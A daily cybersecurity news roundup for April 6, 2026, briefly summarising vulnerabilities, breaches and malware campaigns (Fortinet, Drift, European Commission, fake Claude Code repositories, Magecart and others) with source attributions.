Here are today’s top cybersecurity stories for Monday, April 6, 2026.
Fortinet Patches Actively Exploited CVE-2026-35616 in FortiClient EMS
Fortinet released an emergency out-of-band hotfix for CVE-2026-35616, a CVSS 9.1 improper access control vulnerability in FortiClient Enterprise Management Server (EMS) versions 7.4.5 and 7.4.6. The flaw allows unauthenticated attackers to execute code or commands via crafted API requests. Exploitation was first recorded against researcher honeypots on March 31, and Shadowserver has identified over 2,000 internet-exposed instances. Organizations running affected versions are urged to apply the hotfix immediately or upgrade to FortiClient EMS 7.4.7 when available. BleepingComputer | The Hacker News
North Korean Group UNC4736 Behind $285 Million Drift Protocol Hack in Six-Month Operation
Solana-based decentralized exchange Drift confirmed that approximately $285 million was stolen on April 1, 2026, in an attack attributed with medium confidence to North Korean state-sponsored group UNC4736, also tracked as AppleJeus and Citrine Sleet. The group spent six months building a trusted presence inside the Drift ecosystem, socially engineering multisig signers into pre-signing hidden authorizations, then triggering a zero-timelock Security Council migration that eliminated the protocol’s final safeguard. Attackers also created a fabricated token with manipulated oracle pricing to drain additional funds. This is the largest DeFi theft of 2026 and the second-largest Solana exploit in history. The Hacker News
CERT-EU Formally Attributes European Commission Cloud Breach to TeamPCP
CERT-EU confirmed the TeamPCP threat group breached the European Commission’s AWS cloud environment on March 19 using an API key stolen in the earlier Trivy supply chain attack. The breach exposed data from 30 EU entities including names, email addresses, and email content from the Europa web hosting platform. The Commission’s Cybersecurity Operations Center did not detect abnormal activity until March 24 — five days after initial access. ShinyHunters published approximately 340 GB of uncompressed stolen data on their dark web leak site on March 28. BleepingComputer
Fake Claude Code Repositories on GitHub Deliver Vidar Infostealer and GhostSocks Malware
Threat actors are using interest in the accidental Anthropic Claude Code source code leak — which occurred on March 31 when a 59.8 MB JavaScript source map was published in an npm package — to distribute malware through fake GitHub repositories. The malicious archive, named “Claude Code – Leaked Source Code,” installs a Rust-based dropper that deploys Vidar v18.7 infostealer and GhostSocks proxy malware. Trend Micro researchers identified the campaign as part of a broader rotating-lure operation active since February 2026 that has impersonated more than 25 software brands. BleepingComputer
Microsoft Documents WhatsApp-Delivered VBS Backdoor Campaign Targeting Windows Users
Microsoft Defender Experts have documented a multi-stage malware campaign, active since late February 2026, delivering malicious Visual Basic Script (VBS) files via WhatsApp attachments. Once executed, scripts drop renamed Windows system tools into hidden directories and retrieve additional payloads from trusted cloud services such as AWS, Tencent Cloud, and Backblaze B2 to blend into normal network traffic. A final unsigned MSI package installs a persistent remote access backdoor. Microsoft recommends organizations block script host execution in untrusted paths and inspect outbound traffic to cloud storage platforms. Microsoft Security Blog
Cisco Patches Identity Services Engine XXE Flaw After Public PoC Exploit Released
Cisco issued a patch for CVE-2026-20029, an XML External Entity (XXE) injection vulnerability in Cisco Identity Services Engine (ISE) and ISE Passive Identity Connector. Attackers with valid administrative credentials can upload a malicious XML file to read arbitrary files from the underlying operating system. Cisco has confirmed no active exploitation at this time, but public proof-of-concept exploit code is now available, increasing risk for organizations that delay patching. No workarounds exist — software updates are the only fix. BleepingComputer
Canada Computers Confirms Magecart Attack Exposed Payment Data of 1,284 Customers
Canada Computers & Electronics confirmed a card skimmer attack on its retail website that exposed full payment card details and personal information for 1,284 guest checkout customers. The malicious script was active between December 29, 2025, and January 22, 2026, when it was removed following a public Reddit post by a customer whose two support tickets were closed without response. Member accounts and in-store purchases were not affected. Affected customers are being offered two years of free credit monitoring and identity theft protection. CBC News | SC Media
WhatsApp Alerts 200 Users After Italian Surveillance Firm Deployed Trojanized iOS App
Meta’s WhatsApp notified approximately 200 users, primarily in Italy, that they had installed a trojanized fake version of the iOS WhatsApp application developed by Asigint, a subsidiary of Italian surveillance company SIO Spa. The malicious app exfiltrated sensitive data, recorded audio, and accessed device cameras. WhatsApp logged out affected users, issued privacy warnings, and plans to serve Asigint with a formal legal demand to cease all malicious activities. The Hacker News
Nacogdoches Memorial Hospital Breach Exposes Data of 257,000 Patients
Nacogdoches Memorial Hospital in Texas disclosed that an unauthorized actor accessed its network between January 15 and January 31, 2026, exfiltrating files containing names, addresses, Social Security numbers, dates of birth, medical record numbers, health plan beneficiary numbers, and facial photographs for 257,073 individuals. Notification letters were not issued until March 31 — more than two months after discovery — drawing scrutiny from multiple law firms over potential violations of state and federal breach notification timelines. SecurityWeek
Stay tuned for today’s in-depth analysis posts.
